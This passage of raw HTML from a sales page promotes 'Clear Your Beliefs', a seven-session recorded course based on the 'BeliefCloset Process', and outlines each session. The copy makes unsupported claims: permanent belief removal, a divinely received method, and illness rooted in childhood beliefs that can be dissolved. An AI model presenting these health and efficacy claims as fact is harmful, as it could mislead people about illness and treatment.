src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and 